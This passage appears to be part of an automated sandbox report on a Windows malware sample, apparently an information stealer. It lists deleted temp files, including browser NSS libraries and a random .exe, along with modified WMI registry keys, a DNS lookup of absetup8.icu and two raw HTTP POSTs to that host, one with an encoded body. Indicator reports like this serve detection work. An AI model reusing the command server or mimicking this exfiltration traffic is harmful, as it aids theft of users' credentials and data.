775 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
776 "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
777 "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
778 "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
779 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
780 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER"
781
782
783* Deleted Files:
784 "C:\\Users\\user\\AppData\\Local\\Temp\\77286712228860818777495.tmp",
785 "C:\\Users\\user\\AppData\\Local\\Temp\\77606567442813517908471.tmp",
786 "C:\\Users\\user\\AppData\\Local\\Temp\\77807507176124744018490.tmp",
787 "C:\\Users\\user\\AppData\\Local\\Temp\\77807961859402425274913.tmp",
788 "C:\\Users\\user\\AppData\\Local\\Temp\\77808751418418532293274.tmp",
789 "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
790 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
791 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
792 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
793 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
794 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
795 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
796 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
797 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
798 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
799 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
800 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
801 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
802 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
803 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
804 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
805 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
806 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
807 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
808 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
809 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
810 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
811 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
812 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
813 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
814 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
815 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
816 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
817 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
818 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
819 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
820 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
821 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
822 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
823 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
824 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
825 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
826 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
827 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
828 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
829 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
830 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
831 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
832 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
833 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
834 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
835 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
836 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
837 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
838 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\",
839 "C:\\Users\\user\\AppData\\Local\\Temp\\fo1GrAw0yY7y3v.exe"
840
841
842* Modified Registry Keys:
843 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
844 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
845 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\PROVIDERS\\Performance\\Performance Refreshed",
846 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
847 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
848 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
849 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
850 "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
851 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
852 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
853 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
854 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
855 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
856 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
857
858
859* Deleted Registry Keys:
860
861* DNS Communications:
862
863 "type": "A",
864 "request": "absetup8.icu",
865 "answers":
866
867 "data": "47.252.1.254",
868 "type": "A"
869
870
871
872
873
874* Domains:
875
876 "ip": "47.252.1.254",
877 "domain": "absetup8.icu"
878
879
880
881* Network Communication - ICMP:
882
883* Network Communication - HTTP:
884
885 "count": 1,
886 "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
887 "uri": "http://absetup8.icu/index.php",
888 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
889 "method": "POST",
890 "host": "absetup8.icu",
891 "version": "1.1",
892 "path": "/index.php",
893 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
894 "port": 80
895
896
897 "count": 1,
898 "body": "",
899 "uri": "http://absetup8.icu/index.php",
900 "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
901 "method": "POST",
902 "host": "absetup8.icu",
903 "version": "1.1",
904 "path": "/index.php",
905 "data": "POST /index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: absetup8.icu\r\nContent-Length: 66393\r\nCache-Control: no-cache\r\n\r\n",
906 "port": 80
907
908
909
910* Network Communication - SMTP:
911
912* Network Communication - Hosts:
913
914 "country_name": "United States",
915 "ip": "47.252.1.254",
916 "inaddrarpa": "",
917 "hostname": "absetup8.icu"
918
919
920
921* Network Communication - IRC: